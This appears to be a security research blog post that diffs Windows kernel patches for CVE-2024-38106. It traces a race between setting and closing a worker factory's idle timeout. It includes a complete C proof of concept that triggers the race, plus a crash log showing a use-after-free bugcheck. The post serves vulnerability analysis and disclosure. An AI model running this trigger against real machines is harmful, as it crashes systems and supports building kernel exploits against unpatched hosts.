Dissecting the CVE-2024-38106 Fix

In the security patches for August, Microsoft fixed several ntoskrnl.exe bugs, and one of them (CVE-2024-38106) being exploited in the wild. As anything ITW always require closer attention, we attempt to create a POC for it by. Windows versions used during patch analysis: Windows 11, July 25 vs August 14.

This post is not meant to be a deep-dive root cause analysis, but hopefully will still be interesting.

Below are the results:

1.jpg

After quickly filtering off non-security changes, we identified two functions of interest; VslGetSetSecureContext() and NtSetInformationWorkerFactory().

VslGetSetSecureContext()

Before:

__int64 __fastcall VslGetSetSecureContext(__int64 a1, __int64 a2, __int64 a3, __int64 a4)
{
 memset(v11, 0, 0x68ui64);
 v11[1] = a2;
 v11[2] = a3;
 v11[3] = a4;
 LOWORD(v8) = (a1 != 0) + 14;
 LOBYTE(v9) = 2;
 return VslpEnterIumSecureMode(v9, v8, 0i64, v11);
}

After:

__int64 __fastcall VslGetSetSecureContext(__int64 a1, int a2, int a3)
{
 memset(v11, 0, 0x68ui64);
 memset(v10, 0, 0x48ui64);
 v6 = 15;
 if ( !a1 )
   v6 = 14;
 WORD1(v11[0]) = v6;
 result = VslpLockPagesForTransfer((unsigned int)v10, a2, a3, a1 != 0, 0);
 if ( (int)result >= 0 )
 {
   v11[1] = v10[0];
   LOBYTE(v8) = 2;
   v11[2] = v10[7];
   v9 = VslpEnterIumSecureMode(v8, WORD1(v11[0]), 0i64, v11);
   VslpUnlockPagesForTransfer(v10);
   return v9;
 }
 return result;

This patch fixes a race condition by implementing proper locking for the VslpEnterIumSecureMode() operation which is supposed to be related to the VBS secure kernel.

NtSetInformationWorkerFactory()

The code changes here are a bit more complicated. Security-related part looks as follows:

Before:

if ( v69[3] >= 0i64 )
  goto LABEL_155;
if ( v69[3] > (__int64)0xFFFFFFFFFF676980ui64 )
  v69[3] = 0xFFFFFFFFFF676980ui64;
if ( v69[3] < (__int64)0xFFFFFFFE9A5F4400ui64 )
  v69[3] = 0xFFFFFFFE9A5F4400ui64;
v40 = v69[3];
*((_QWORD *)v15 + 14) = v69[3];
v69[1] = -1i64;
KeSetTimer2(v15 + 424, v40, -v40, v69);
goto LABEL_89;

After:

   case 2:	// enum WORKERFACTORYINFOCLASS: WorkerFactoryIdleTimeout 
      if ( (unsigned int)Feature_1697191224__private_IsEnabledDeviceUsage()
        && *(_BYTE *)(*((_QWORD *)v16 + 2) + 0x21i64) )
      {
        Thread = 0x80;
        goto LABEL_41;
      }
      v20 = v63[3];
      if ( v63[3] >= 0i64 )
      {
        Thread = 0xC000000D;
        v15 = 0;
      }
      else
      {
        if ( v63[3] > -10000000i64 )
          v20 = -10000000i64;
        if ( v20 < -6000000000i64 )
          v20 = -6000000000i64;
        v63[3] = v20;
        *((_QWORD *)v16 + 14) = v20;
        v63[1] = -1i64;
        KeSetTimer2((__int64)(v16 + 424), v20, -v20, (__int64)v63);
        v15 = 0;
      }
      goto LABEL_99;

As you can see, a flag check had been added:

*(_BYTE *)(*((_QWORD *)v16 + 2) + 0x21i64) )

This flag is set during shutdown inside NtShutdownWorkerFactory() –> ExpShutdownWorkerFactory():

Object = 0i64;
v4 = ObReferenceObjectByHandle(a1, 0x20u, ExpWorkerFactoryObjectType, PreviousMode, &Object, 0i64);
if ( v4 >= 0 )
{
  v5 = (struct _EX_RUNDOWN_REF *)Object;
  ExpShutdownWorkerFactory(Object);
if ( (Object[51] & 0x200) != 0 )
    ExpLeaveWorkerFactoryAwayMode(Object);
if ( (_QWORD *)Object[74] == Object + 53 && (unsigned __int8)KiDeregisterObjectWaitBlock(Object + 53) )
    ObfDereferenceObjectWithTag(Object, 0x746C6644u);
*(_BYTE *)(Object[2] + 33i64) = 1;            // shutdown flag set

This means that there is indeed a race condition between the object construction (by NtSetInformationWorkerFactory(.., WorkerFactoryIdleTimeout, ..)) and destruction (by NtShutdownWorkerFactory()). The POC is shown below.

Proof of Concept

#include "nt.h"
#include "stdio.h"
#include "time.h"

#define TEST_RACE_COUNT 0x6000

HANDLE hWorkingFactory;
HANDLE hIoCompletion;
HANDLE hProcess;

DWORD WINAPI th_working_factory_constructor(LPVOID Param) 
{
  WORKER_FACTORY_BASIC_INFORMATION worker_info_buf = { 0x0 };
  DWORD out_len;
  hProcess = GetCurrentProcess();
  hIoCompletion = CreateIoCompletionPort(INVALID_HANDLE_VALUE, NULL, 0, 0);
  LONG wk;
  NTSTATUS stat;
  for (int i = 0; i < 0x800000; i++) {
    hWorkingFactory = NULL;
    stat = NtCreateWorkerFactory(&hWorkingFactory, GENERIC_ALL, NULL, hIoCompletion, hProcess, NULL, 0, 2, 0, 0);
    NtClose(hWorkingFactory);
  }

  ExitThread(0);
}

void race_test_working_factory() 
{
  LARGE_INTEGER liDueTime;

  LONGLONG timeouts[] = { -1000000LL, -2000000LL, -3000000LL, -5000000LL, -10000000LL, -20000000LL, -30000000LL };

  LONG wk;
  for (size_t k = 0; k < 7; k++) {
    for (size_t i = 0; i < TEST_RACE_COUNT; i++) {
      liDueTime.QuadPart = timeouts[k];    // 0.1-20 seconds
      NtSetInformationWorkerFactory(hWorkingFactory, WorkerFactoryIdleTimeout, &liDueTime, sizeof(liDueTime));
    }
  }
}

void race_test_close() {
  while (1) {
    NtClose(hWorkingFactory);
  }
}

void race_test_nls() {
  getchar();
  HANDLE hThread_constructor = CreateThread(NULL, 0, (LPTHREAD_START_ROUTINE)th_working_factory_constructor, 0, 0, NULL);
  HANDLE hThread_constructor3 = CreateThread(NULL, 0, (LPTHREAD_START_ROUTINE)race_test_working_factory, 0, 0, NULL);
  HANDLE hThread_constructor2 = CreateThread(NULL, 0, (LPTHREAD_START_ROUTINE)race_test_close, 0, 0, NULL);
  WaitForSingleObject(hThread_constructor, INFINITE);
}

int main() {
  srand(time(NULL));
  init_lib_calls();
  hProcess = GetCurrentProcess();
  race_test_nls();
}

Note that trigger requires calling NtClose() on worker factory object handle to achieve vulnerable state.

Crash Log

IRQL_NOT_LESS_OR_EQUAL (a)
An attempt was made to access a pageable (or completely invalid) address at an
interrupt request level (IRQL) that is too high.  This is usually
caused by drivers using improper addresses.
If a kernel debugger is available get the stack backtrace.
Arguments:
Arg1: ffff800520e90f50, memory referenced
Arg2: 0000000000000002, IRQL
Arg3: 0000000000000000, bitfield :
    bit 0 : value 0 = read operation, 1 = write operation
    bit 3 : value 0 = not an execute operation, 1 = execute operation (only on chips which support this level of status)
Arg4: fffff803250bc750, address which referenced memory

Debugging Details:

Key  : WER.OS.Version
Value: 10.0.19041.1
BUGCHECK_CODE:  a
BUGCHECK_P1: ffff800520e90f50
BUGCHECK_P2: 2
BUGCHECK_P3: 0
BUGCHECK_P4: fffff803250bc750
READ_ADDRESS:  ffff800520e90f50 Special pool
PROCESS_NAME:  nt_race_tester.exe

TRAP_FRAME:  ffffc38c54653740 -- (.trap 0xffffc38c54653740)
NOTE: The trap frame does not contain all registers.
Some register values may be zeroed or incorrect.
rax=ffff800520e90f20 rbx=0000000000000000 rcx=000000006a4618d3
rdx=ffff800520e90f20 rsi=0000000000000000 rdi=0000000000000000
rip=fffff803250bc750 rsp=ffffc38c546538d0 rbp=0000000000000001
 r8=ffffc38c54653900  r9=0000000000000000 r10=fffff80324e0d000
r11=ffff800523464f20 r12=0000000000000000 r13=0000000000000000
r14=0000000000000000 r15=0000000000000000
iopl=0         nv up ei ng nz na pe nc
nt!KiInsertTimer2WithCollectionLockHeld+0xc0:
fffff803250bc750 483b4a30        cmp     rcx,qword ptr [rdx+30h] ds:ffff800520e90f50=????????????????
Resetting default scope

STACK_TEXT:
ffffc38c54652e48 fffff80325325e12     : ffffc38c54652fb0 fffff8032518c470 0000000000000000 0000000000000000 : nt!DbgBreakPointWithStatus
ffffc38c54652e50 fffff803253253f6     : 0000000000000003 ffffc38c54652fb0 fffff80325222ae0 000000000000000a : nt!KiBugCheckDebugBreak+0x12
ffffc38c54652eb0 fffff8032520abf7     : 0000000000000000 0000000000000001 ffff800512a86f08 ffffc38c546535e0 : nt!KeBugCheck2+0x946
ffffc38c546535c0 fffff8032521f3a9     : 000000000000000a ffff800520e90f50 0000000000000002 0000000000000000 : nt!KeBugCheckEx+0x107
ffffc38c54653600 fffff8032521ad78     : 0000000000000400 ffffc60d744dcec0 0000000000000218 ffff800505d7af20 : nt!KiBugCheckDispatch+0x69
ffffc38c54653740 fffff803250bc750     : 0000000000000000 ffff800512a86f8a 0000000000000000 fffff80325a3ece0 : nt!KiPageFault+0x478
ffffc38c546538d0 fffff803250bc3e2     : ffff800512a86f08 ffff800512a86f01 0000000000000001 0000000000000001 : nt!KiInsertTimer2WithCollectionLockHeld+0xc0
ffffc38c54653920 fffff80325116e5b     : 0000000000000000 00001f8000e90000 0000000000000002 0000000000000000 : nt!KeSetTimer2+0x172
ffffc38c54653990 fffff8032521eb05     : 0000000000000000 0000000000000000 0000000000000000 ffff800500000000 : nt!NtSetInformationWorkerFactory+0x62b
ffffc38c54653b00 00007ffd7f0704c4     : 00007ff668ab1304 0000000000000000 0000000000000000 0000000000000000 : nt!KiSystemServiceCopyEnd+0x25
0000000e9d7ffe58 00007ff668ab1304     : 0000000000000000 0000000000000000 0000000000000000 0000000000000000 : ntdll!NtSetInformationWorkerFactory+0x14
0000000e9d7ffe60 0000000000000000     : 0000000000000000 0000000000000000 0000000000000000 0000000000000003 : nt_race_tester+0x1304

SYMBOL_NAME:  nt!KiInsertTimer2WithCollectionLockHeld+c0
MODULE_NAME: nt
IMAGE_NAME:  ntkrnlmp.exe

As we can see, reaching KiInsertTimer2WithCollectionLockHeld() worker factory object and associated timer are already freed.

3: kd> dq ffff800520e90f50
ffff800520e90f50  ???????????????? ????????????????
ffff800520e90f60  ???????????????? ????????????????
ffff800520e90f70  ???????????????? ????????????????
ffff800520e90f80  ???????????????? ????????????????
ffff800520e90f90  ???????????????? ????????????????
ffff800520e90fa0  ???????????????? ????????????????
ffff800520e90fb0  ???????????????? ????????????????
ffff800520e90fc0  ???????????????? ????????????????
3: kd> !pool ffff800520e90f50
Pool page ffff800520e90f50 region is Special pool
ffff800520e90000: Unable to get contents of special pool block